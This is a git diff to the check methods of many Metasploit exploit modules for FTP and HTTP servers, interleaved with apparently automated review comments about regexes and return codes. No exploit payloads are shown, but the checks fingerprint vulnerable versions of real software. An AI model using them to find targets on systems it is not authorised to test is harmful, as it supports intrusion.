diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb index 89996329c8..35e0d31ea7 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect if (banner =~ /9\.2\.0\.1\.0/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb index 38fbb0ee38..6120334331 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect if (banner =~ /9\.2\.0\.1\.0/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/pcman_stor.rb b/modules/exploits/windows/ftp/pcman_stor.rb index e87af145c6..a8e3474e1d 100644 --- a/modules/exploits/windows/ftp/pcman_stor.rb +++ b/modules/exploits/windows/ftp/pcman_stor.rb @@ -60,10 +60,10 @@ class Metasploit3 < Msf::Exploit::Remote if c and banner =~ /220 PCMan's FTP Server 2\.0/ # Auth is required to exploit - print_status("Able to authenticate, and banner shows the vulnerable version") - return Exploit::CheckCode::Vulnerable + vprint_status("Able to authenticate, and banner shows the vulnerable version") + return Exploit::CheckCode::Appears elsif not c and banner =~ /220 PCMan's FTP Server 2\.0/ - print_status("Unable to authenticate, but banner shows the vulnerable version") + vprint_status("Unable to authenticate, but banner shows the vulnerable version") # Auth failed, but based on version maybe the target is vulnerable return Exploit::CheckCode::Appears end 
diff --git a/modules/exploits/windows/ftp/ricoh_dl_bof.rb b/modules/exploits/windows/ftp/ricoh_dl_bof.rb index 08406d38eb..9054489c4a 100644 --- a/modules/exploits/windows/ftp/ricoh_dl_bof.rb +++ b/modules/exploits/windows/ftp/ricoh_dl_bof.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect if banner =~ /220 DSC ftpd 1\.0 FTP Server/ - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb index c6a5546220..f6d9bd49f0 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_user.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb @@ -74,8 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote banner = sock.get(-1,3) disconnect - if (banner =~ /Sami FTP Server 2.0.2/) - return Exploit::CheckCode::Vulnerable + if (banner =~ /Sami FTP Server 2\.0\.2/) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/servu_chmod.rb b/modules/exploits/windows/ftp/servu_chmod.rb index 51b79cd9b9..d02f862d9f 100644 --- a/modules/exploits/windows/ftp/servu_chmod.rb +++ b/modules/exploits/windows/ftp/servu_chmod.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\d)/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/ftp/servu_mdtm.rb b/modules/exploits/windows/ftp/servu_mdtm.rb index 42a243fafb..070c3f348e 100644 --- a/modules/exploits/windows/ftp/servu_mdtm.rb +++ b/modules/exploits/windows/ftp/servu_mdtm.rb 
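Review bot: The servu_chmod.rb banner regex `/Serv-U FTP Server v((4.(0|1))|3.\d)/` leaves both version dots unescaped, so `4x0` or `3-5` style strings also match, while the sami_ftpd_user.rb and brightstor hunks in this commit fix exactly this pattern. `/Serv-U FTP Server v((4\.(0|1))|3\.\d)/` is the intended literal. The enclosing `check` method starts before this hunk.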
@@ -96,31 +96,31 @@ class Metasploit3 < Msf::Exploit::Remote
 case banner
 when /Serv-U FTP Server v4\.1/
- print_status('Found version 4.1.0.3, exploitable')
- return Exploit::CheckCode::Vulnerable
-
- when /Serv-U FTP Server v5\.0/
- print_status('Found version 5.0.0.0 (exploitable) or 5.0.0.4 (not), try it!');
+ vprint_status('Found version 4.1.0.3, exploitable')
 return Exploit::CheckCode::Appears
+ when /Serv-U FTP Server v5\.0/
+ vprint_status('Found version 5! 5.0.0.0 may be exploitable, but not 5.0.0.4');
+ return Exploit::CheckCode::Detected
+
 when /Serv-U FTP Server v4\.0/
- print_status('Found version 4.0.0.4 or 4.1.0.0, additional check.');
+ vprint_status('Found version 4.0.0.4 or 4.1.0.0, additional check.');
 send_user(datastore['USER'])
 send_pass(datastore['PASS'])
 if (double_ff?())
- print_status('Found version 4.0.0.4, exploitable');
- return Exploit::CheckCode::Vulnerable
+ vprint_status('Found version 4.0.0.4, exploitable');
+ return Exploit::CheckCode::Appears
 else
- print_status('Found version 4.1.0.0, exploitable');
- return Exploit::CheckCode::Vulnerable
+ vprint_status('Found version 4.1.0.0, exploitable');
+ return Exploit::CheckCode::Appears
 end
- when /Serv-U FTP Server/
- print_status('Found an unknown version, try it!');
+ when /Serv\-U FTP Server/
+ vprint_status('Found an unknown version, try it!');
 return Exploit::CheckCode::Detected
 else
- print_status('We could not recognize the server banner')
+ vprint_status('We could not recognize the server banner')
 return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/ftp/turboftp_port.rb b/modules/exploits/windows/ftp/turboftp_port.rb
index 986745dbba..f77e5c41b7 100644
--- a/modules/exploits/windows/ftp/turboftp_port.rb
+++ b/modules/exploits/windows/ftp/turboftp_port.rb
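Review bot: The new `when /Serv\-U FTP Server/` branch escapes a hyphen that is not special outside a character class, while the other branches of the same `case` write `Serv-U` unescaped; keep them consistent with `when /Serv-U FTP Server/`. The rewritten `vprint_status(...)` lines also carry over the trailing semicolons, and `double_ff?()` keeps empty parens, neither of which is idiomatic Ruby. The v4.0 branch logs in with `datastore['USER']`/`datastore['PASS']` as part of check, so this check is not passive; a comment on that branch, such as `# this check authenticates to the server to tell 4.0.0.4 from 4.1.0.0`, would make that visible to whoever runs it.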
@@ -63,9 +63,9 @@ class Metasploit3 < Msf::Exploit::Remote
 connect
 disconnect
 if (banner =~ /1\.30\.823/)
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 elsif (banner =~ /1\.30\.826/)
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 end
 return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb
index 49a66b4f45..412789b02e 100644
--- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb
+++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb
@@ -98,9 +98,9 @@ class Metasploit3 < Msf::Exploit::Remote
 def check
 connect
 disconnect
- print_status("FTP Banner: #{banner}".strip)
+ vprint_status("FTP Banner: #{banner}".strip)
 if banner =~ /\(vftpd .*\)/
- return Exploit::CheckCode::Appears
+ return Exploit::CheckCode::Detected
 end
 return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb
index 61e8d942bd..6b3f186759 100644
--- a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb
+++ b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
 connect
 disconnect
 if (banner =~ /5\.0\.3/)
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 end
 return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb
index f6e6daa27c..126618beaa 100644
--- a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb
+++ b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb
@@ -47,8 +47,8 @@ class Metasploit3 < Msf::Exploit::Remote
 def check
 connect
 disconnect
- if (banner =~ /WS_FTP Server 5.0.5/)
- return Exploit::CheckCode::Vulnerable
+ if (banner =~ /WS_FTP Server 5\.0\.5/)
+ return Exploit::CheckCode::Appears
 end
 return Exploit::CheckCode::Safe
 end
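Review bot: The two turboftp_port branches now return the same `Exploit::CheckCode::Appears`, so the `if`/`elsif` pair can collapse into a single test: `if (banner =~ /1\.30\.82[36]/)` followed by one `return Exploit::CheckCode::Appears`. That keeps the version-specific intent and removes the duplicated return. The check method's `def` line is above this hunk.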
diff --git a/modules/exploits/windows/ftp/xlink_server.rb b/modules/exploits/windows/ftp/xlink_server.rb
index 2d87b3d703..12e7a44290 100644
--- a/modules/exploits/windows/ftp/xlink_server.rb
+++ b/modules/exploits/windows/ftp/xlink_server.rb
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
 disconnect
 if (banner =~ /XLINK FTP Server/)
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Detected
 end
 return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/games/ut2004_secure.rb b/modules/exploits/windows/games/ut2004_secure.rb
index abef347ad2..509bb4c411 100644
--- a/modules/exploits/windows/games/ut2004_secure.rb
+++ b/modules/exploits/windows/games/ut2004_secure.rb
@@ -97,19 +97,19 @@ class Metasploit3 < Msf::Exploit::Remote
 return
 end
- print_status("Detected Unreal Tournament Server Version: #{vers}")
+ vprint_status("Detected Unreal Tournament Server Version: #{vers}")
 if (vers =~ /^(3120|3186|3204)$/)
- print_status("This system appears to be exploitable")
+ vprint_status("This system appears to be exploitable")
 return Exploit::CheckCode::Appears
 end
 if (vers =~ /^(2...)$/)
- print_status("This system appears to be running UT2003")
+ vprint_status("This system appears to be running UT2003")
 return Exploit::CheckCode::Detected
 end
- print_status("This system appears to be patched")
+ vprint_status("This system appears to be patched")
 return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/http/altn_securitygateway.rb b/modules/exploits/windows/http/altn_securitygateway.rb
index a1bdc56051..2df56e665a 100644
--- a/modules/exploits/windows/http/altn_securitygateway.rb
+++ b/modules/exploits/windows/http/altn_securitygateway.rb
@@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def check
 if auto_target
- Exploit::CheckCode::Vulnerable
+ Exploit::CheckCode::Appears
 end
 Exploit::CheckCode::Safe
 end
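Review bot: In altn_securitygateway the value inside `if auto_target` is discarded: without `return`, execution falls through to the trailing `Exploit::CheckCode::Safe`, so check reports Safe even when a target was identified. The defect predates the commit, but rewriting that exact line was the moment to fix it; change it to `return Exploit::CheckCode::Appears`, which is the form the w3who_query hunk in this same commit uses for the identical `if auto_target` pattern.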
diff --git a/modules/exploits/windows/http/apache_chunked.rb b/modules/exploits/windows/http/apache_chunked.rb
index 1b9c05d237..07a3e8a1c9 100644
--- a/modules/exploits/windows/http/apache_chunked.rb
+++ b/modules/exploits/windows/http/apache_chunked.rb
@@ -156,8 +156,8 @@ class Metasploit3 < Msf::Exploit::Remote
 def check
 response = send_request_raw({'uri' => '/'}, 5)
 if response.nil?
- print_status("No response to request")
- return Exploit::CheckCode::Safe
+ vprint_status("No response to request")
+ return Exploit::CheckCode::Unknown
 end
 http_fingerprint({ :response => response })
 # Custom Server header matching
@@ -166,24 +166,20 @@ class Metasploit3 < Msf::Exploit::Remote
 case response['Server']
 when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
- print_status("This looks like an Oracle 8.1.7 Apache service (one-shot only)")
+ vprint_status("This looks like an Oracle 8.1.7 Apache service (one-shot only)")
 when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
- print_status("This looks like an Oracle 9.1.0 Apache service (multiple tries allowed)")
+ vprint_status("This looks like an Oracle 9.1.0 Apache service (multiple tries allowed)")
 when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
- print_status("This looks like an Oracle 9.2.0 Apache service (multiple tries allowed)")
+ vprint_status("This looks like an Oracle 9.2.0 Apache service (multiple tries allowed)")
 when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
- print_status("IBM backported the patch, this system is not vulnerable")
+ vprint_status("IBM backported the patch, this system is not vulnerable")
 code = Exploit::CheckCode::Safe
 when /Apache(-AdvancedExtranetServer)?\/(1\.([0-2]\.[0-9]|3\.([0-9][^0-9]|[0-1][0-9]|2[0-5]))|2\.0.([0-9][^0-9]|[0-2][0-9]|3[0-8]))/
 else
 code = Exploit::CheckCode::Safe
 end
- if code == Exploit::CheckCode::Appears
- print_status("Vulnerable server: #{response['Server']}")
- else
- print_status("Server is probably not vulnerable: #{response['Server']}")
- end
+ vprint_status("Server: #{response['Server']}")
 return code
 end
diff --git a/modules/exploits/windows/http/apache_modjk_overflow.rb b/modules/exploits/windows/http/apache_modjk_overflow.rb
index c1ffa289ee..b8f8d6c4ed 100644
--- a/modules/exploits/windows/http/apache_modjk_overflow.rb
+++ b/modules/exploits/windows/http/apache_modjk_overflow.rb
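Review bot: The Apache version regex on the `when /Apache(-AdvancedExtranetServer)?…/` line has an unescaped dot in `2\.0.(`, so a banner such as `Apache/2.0x38` also matches; since this commit escapes dots in many other banner checks, change that fragment to `2\.0\.(`. That `when` branch has an empty body and the three Oracle branches never assign `code` either, so the return value for all four comes from whatever `code` was set to before this hunk (the start of check is outside the hunk); a comment such as `# version in the affected range: keep the default code` on the empty branch would make the deliberate fall-through readable. The collapsed `vprint_status("Server: #{response['Server']}")` no longer says whether the server matched, which is fine for verbose output but means the only signal is the returned code.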
@@ -60,8 +60,8 @@ class Metasploit3 < Msf::Exploit::Remote
 resp = sock.get_once
 disconnect
- if (resp and (m = resp.match(/Server: Apache\/(.*) \(Win32\)(.*) mod_jk\/1.2.20/))) then
- print_status("Apache version detected : #{m[1]}")
+ if (resp and (m = resp.match(/Server: Apache\/(.*) \(Win32\)(.*) mod_jk\/1\.2\.20/))) then
+ vprint_status("Apache version detected : #{m[1]}")
 return Exploit::CheckCode::Appears
 else
 return Exploit::CheckCode::Safe
diff --git a/modules/exploits/windows/http/badblue_ext_overflow.rb b/modules/exploits/windows/http/badblue_ext_overflow.rb
index 290fea3f54..bbf9ac4435 100644
--- a/modules/exploits/windows/http/badblue_ext_overflow.rb
+++ b/modules/exploits/windows/http/badblue_ext_overflow.rb
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def check
 info = http_fingerprint # check method
 if (info =~ /BadBlue\/2\.5/)
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 end
 Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/http/bea_weblogic_post_bof.rb b/modules/exploits/windows/http/bea_weblogic_post_bof.rb
index a86071c0c2..c3b57dcdaf 100644
--- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb
+++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
 case fingerprint
 when /Version found/
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 when /BEA WebLogic connector vulnerable/
 return Exploit::CheckCode::Appears
 when /BEA WebLogic connector undefined/
diff --git a/modules/exploits/windows/http/cyclope_ess_sqli.rb b/modules/exploits/windows/http/cyclope_ess_sqli.rb
index 4e415858c6..7c9ee042fe 100644
--- a/modules/exploits/windows/http/cyclope_ess_sqli.rb
+++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb
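Review bot: The rewritten apache_modjk line keeps `then` on a multi-line `if` and an assignment buried in the condition; `m = resp && resp.match(/Server: Apache\/(.*) \(Win32\)(.*) mod_jk\/1\.2\.20/)` on its own line followed by `if m` reads better and preserves the escaped-dot fix. The greedy `(.*)` groups also accept arbitrary text between `Apache/` and `(Win32)`, so the version printed from `m[1]` can contain more than the version token; `([^\s]+)` is tighter. The `if`/`else` is closed outside the hunk.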
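Review bot: In bea_weblogic_post_bof the `when /Version found/` and `when /BEA WebLogic connector vulnerable/` branches now return the same `Exploit::CheckCode::Appears`, so they can be one branch: `when /Version found/, /BEA WebLogic connector vulnerable/` with a single `return Exploit::CheckCode::Appears`. The `case` continues past the end of the hunk.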
@@ -60,17 +60,15 @@ class Metasploit3 < Msf::Exploit::Remote
 path = File.dirname("#{target_uri.path}/.")
 b64_version = get_version(path)
 if b64_version.empty?
- print_error("#{peer} - Unable to determine the version number")
+ vprint_error("#{peer} - Unable to determine the version number")
 else
 b64_version = Rex::Text.decode_base64(b64_version)
 if b64_version =~ /^[0-6]\.1/
- return Exploit::CheckCode::Vulnerable
- else
- return Exploit::CheckCode::Safe
+ return Exploit::CheckCode::Appears
 end
 end
- return Exploit::CheckCode::Unknown
+ return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/http/desktopcentral_file_upload.rb b/modules/exploits/windows/http/desktopcentral_file_upload.rb
index d790b28ccb..7ddae4d011 100644
--- a/modules/exploits/windows/http/desktopcentral_file_upload.rb
+++ b/modules/exploits/windows/http/desktopcentral_file_upload.rb
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
 build = $1
 print_status("Manage Desktop Central 8 build #{build} found")
 if build < "80293"
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 else
 return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb
index bd72a06f5c..dda0bdf929 100644
--- a/modules/exploits/windows/http/easyftp_list.rb
+++ b/modules/exploits/windows/http/easyftp_list.rb
@@ -77,8 +77,8 @@ class Metasploit3 < Msf::Exploit::Remote
 def check
 info = http_fingerprint # check method
- if info and (info =~ /Easy-Web Server\//)
- return Exploit::CheckCode::Vulnerable
+ if info and (info =~ /Easy\-Web Server\//)
+ return Exploit::CheckCode::Detected
 end
 Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/http/hp_imc_bims_upload.rb b/modules/exploits/windows/http/hp_imc_bims_upload.rb
index 4766b4e4a6..334185a104 100644
--- a/modules/exploits/windows/http/hp_imc_bims_upload.rb
+++ b/modules/exploits/windows/http/hp_imc_bims_upload.rb
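Review bot: In cyclope_ess_sqli the final `return Exploit::CheckCode::Safe` is now reached both when the decoded version is outside the range and when `b64_version.empty?`, i.e. when the version could not be determined at all; reporting Safe for an undetermined version is misleading and inconsistent with the apache_chunked and hp_nnm_ovas hunks of this same commit, which return Unknown when there is nothing to inspect. Keep `return Exploit::CheckCode::Unknown` inside the `if b64_version.empty?` branch, right after the `vprint_error`, and leave the trailing `return Exploit::CheckCode::Safe` for the version-known case. The `^[0-6]\.1` anchor is a line anchor rather than a string anchor; `\A` would be the stricter choice if the decoded value can contain newlines.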
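Review bot: `if build < "80293"` in desktopcentral_file_upload compares build numbers as strings, so any build with a different digit count is ordered lexically (a constructed `"100000"` sorts below `"80293"` and would be reported Appears); `if build.to_i < 80293` compares what the message calls a build number. `build = $1` also depends on the global match variable set above the hunk, where `Regexp.last_match(1)` would be explicit. Both are pre-existing, but the return line between them was rewritten here. The `print_status` on the next line is also the only status message in this commit not moved to `vprint_status`.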
@@ -61,12 +61,13 @@ class Metasploit3 < Msf::Exploit::Remote
 })
 if res.nil?
- print_error("Unable to determine, because the request timed out.")
+ vprint_error("Unable to determine, because the request timed out.")
 return Exploit::CheckCode::Unknown
 end
 if res.code == 200 and res.headers['Content-Type'] =~ /application\/doc/ and res.body =~ /com\.h3c\.imc\.bims\.acs\.server\.UploadServlet/
- return Exploit::CheckCode::Vulnerable
+ vprint_status("Upload interface found. Must be tested to verify vulnerable state.")
+ return Exploit::CheckCode::Appears
 elsif res.code == 405 and res.message =~ /Method Not Allowed/
 return Exploit::CheckCode::Appears
 end
diff --git a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb
index e9e4017905..45369d96d4 100644
--- a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb
+++ b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb
@@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
 depth = datastore['DEPTH']
 install_path = datastore['INSTALLPATH']
- print_status("#{peer} - Detecting tomcat version...")
+ vprint_status("#{peer} - Detecting tomcat version...")
 tomcat_version = get_tomcat_version
 if tomcat_version
@@ -118,19 +118,19 @@ class Metasploit3 < Msf::Exploit::Remote
 res = read_file(depth, location, "index.jsp")
 if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/
- print_good("#{peer} - Traversal exists and parameters are correct...")
+ vprint_good("#{peer} - Traversal exists and parameters are correct...")
 return Exploit::CheckCode::Vulnerable
 elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/
- print_warning("#{peer} - Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...")
+ vprint_warning("#{peer} - Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...")
 return Exploit::CheckCode::Appears
 else
- print_status("#{peer} - Failed to verify the directory traversal...")
+ vprint_status("#{peer} - Failed to verify the directory traversal...")
 end
 else
- print_error("#{peer} - Tomcat version not detected...")
+ vprint_error("#{peer} - Tomcat version not detected...")
 end
- print_status("#{peer} - Checking if the vulnerable web service and method exist...")
+ vprint_status("#{peer} - Checking if the vulnerable web service and method exist...")
 res = send_request_cgi({
 'uri' => normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin'),
 'vars_get' => { 'wsdl' => 1 }
diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb
index c2f655aa13..86e4ba4890 100644
--- a/modules/exploits/windows/http/hp_nnm_ovas.rb
+++ b/modules/exploits/windows/http/hp_nnm_ovas.rb
@@ -183,11 +183,11 @@ class Metasploit3 < Msf::Exploit::Remote
 resp = send_request_raw({'uri' => '/topology/home'}, 5)
 if resp.nil?
- print_status("No response to request")
- return Exploit::CheckCode::Safe
+ vprint_status("No response to request")
+ return Exploit::CheckCode::Unknown
 end
- if (resp.body =~ /NNM Release B.07.53/ || resp.body =~ /NNM Release B.07.52/ || resp.body =~ /NNM Release B.07.51/)
+ if (resp.body =~ /NNM Release B\.07\.53/ || resp.body =~ /NNM Release B\.07\.52/ || resp.body =~ /NNM Release B\.07\.51/)
 return Exploit::CheckCode::Appears
 end
diff --git a/modules/exploits/windows/http/httpdx_handlepeer.rb b/modules/exploits/windows/http/httpdx_handlepeer.rb
index ddc21fc8d5..157598b3e9 100644
--- a/modules/exploits/windows/http/httpdx_handlepeer.rb
+++ b/modules/exploits/windows/http/httpdx_handlepeer.rb
@@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def check
 info = http_fingerprint # check method
 if info and (info =~ /httpdx\/(.*) \(Win32\)/)
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Detected
 end
 Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb
index ad74759f42..5569903845 100644
--- a/modules/exploits/windows/http/httpdx_tolog_format.rb
+++ b/modules/exploits/windows/http/httpdx_tolog_format.rb
@@ -137,7 +137,7 @@ For now, that will have to be done manually.
 if version
 print_status("HTTPDX version detected : #{version}")
 if (version =~ /1\.4/) or (version == "1.5")
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 end
 end
 Exploit::CheckCode::Safe
diff --git a/modules/exploits/windows/http/intrasrv_bof.rb b/modules/exploits/windows/http/intrasrv_bof.rb
index 71cbf47bb7..c7bb9bd174 100644
--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
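Review bot: The three `resp.body =~` alternatives in hp_nnm_ovas can be a single expression, `if (resp.body =~ /NNM Release B\.07\.5[1-3]/)`, which keeps the escaped dots added here and scans the body once instead of three times. The `resp.body` access is only safe because the nil case returns Unknown just above; the rest of check, including the Safe path, is outside the hunk.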
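Review bot: httpdx_tolog_format keeps `print_status("HTTPDX version detected : #{version}")` while every sibling check in this commit switches to `vprint_status`; this one looks missed. The condition `(version =~ /1\.4/) or (version == "1.5")` is also unanchored (`11.4` and `1.45` both match) and uses the low-precedence `or`; `if version =~ /\A1\.4/ || version == "1.5"` is tighter. The method's `def` and the code that sets `version` are above the hunk.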
@@ -73,8 +73,8 @@ class Metasploit3 < Msf::Exploit::Remote
 sock.put("GET / HTTP/1.0\r\n\r\n")
 res = sock.get_once
- if res =~ /intrasrv 1.0/
- return Exploit::CheckCode::Vulnerable
+ if res =~ /intrasrv 1\.0/
+ return Exploit::CheckCode::Appears
 else
 return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/http/kolibri_http.rb b/modules/exploits/windows/http/kolibri_http.rb
index 43d201dbcb..aeb76201d1 100644
--- a/modules/exploits/windows/http/kolibri_http.rb
+++ b/modules/exploits/windows/http/kolibri_http.rb
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def check
 info = http_fingerprint
 if info and (info =~ /kolibri-2\.0/)
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 end
 Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb
index a695efa0b7..083a250014 100644
--- a/modules/exploits/windows/http/mailenable_auth_header.rb
+++ b/modules/exploits/windows/http/mailenable_auth_header.rb
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def check
 info = http_fingerprint # check method
 if (info =~ /MailEnable/)
- return Exploit::CheckCode::Appears
+ return Exploit::CheckCode::Detected
 end
 Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb
index 1bb9a52884..29f338de3f 100644
--- a/modules/exploits/windows/http/mcafee_epolicy_source.rb
+++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
 banner = sock.get(-1,3)
- if (banner =~ /Spipe\/1.0/)
+ if (banner =~ /Spipe\/1\.0/)
 return Exploit::CheckCode::Appears
 end
 return Exploit::CheckCode::Safe
diff --git a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb
index 3cfbb9a2a6..582bf2475f 100644
--- a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb
+++ b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb
@@ -72,9 +72,10 @@ class Metasploit3 < Msf::Exploit::Remote
 disconnect
 if (banner =~ /WDaemon\/6\.8\.[0-5]/)
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 end
- return Exploit::CheckCode::Safe
+
+ return Exploit::CheckCode::Safe
 end
 def exploit
diff --git a/modules/exploits/windows/http/miniweb_upload_wbem.rb b/modules/exploits/windows/http/miniweb_upload_wbem.rb
index 8e5a2fb904..c1f0650c45 100644
--- a/modules/exploits/windows/http/miniweb_upload_wbem.rb
+++ b/modules/exploits/windows/http/miniweb_upload_wbem.rb
@@ -71,7 +71,8 @@ class Metasploit3 < Msf::Exploit::Remote
 'uri' => uri
 })
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
- fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+ vprint_error("Connection failed")
+ return Exploit::CheckCode::Unknown
 end
 if !res or res.headers['Server'].empty?
@@ -80,8 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
 return Exploit::CheckCode::Detected
 end
- return Exploit::CheckCode::Unknown
-
+ return Exploit::CheckCode::Safe
 end
 def upload(filename, filedata)
diff --git a/modules/exploits/windows/http/navicopa_get_overflow.rb b/modules/exploits/windows/http/navicopa_get_overflow.rb
index d3b156d697..f0c62c0ef6 100644
--- a/modules/exploits/windows/http/navicopa_get_overflow.rb
+++ b/modules/exploits/windows/http/navicopa_get_overflow.rb
@@ -60,8 +60,8 @@ class Metasploit3 < Msf::Exploit::Remote
 resp = sock.get_once
 disconnect
- if (resp =~ /2.01 11th September/)
- return Exploit::CheckCode::Vulnerable
+ if (resp =~ /2\.01 11th September/)
+ return Exploit::CheckCode::Appears
 end
 return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/http/netdecision_http_bof.rb b/modules/exploits/windows/http/netdecision_http_bof.rb
index 08710c0659..0bd10a55d8 100644
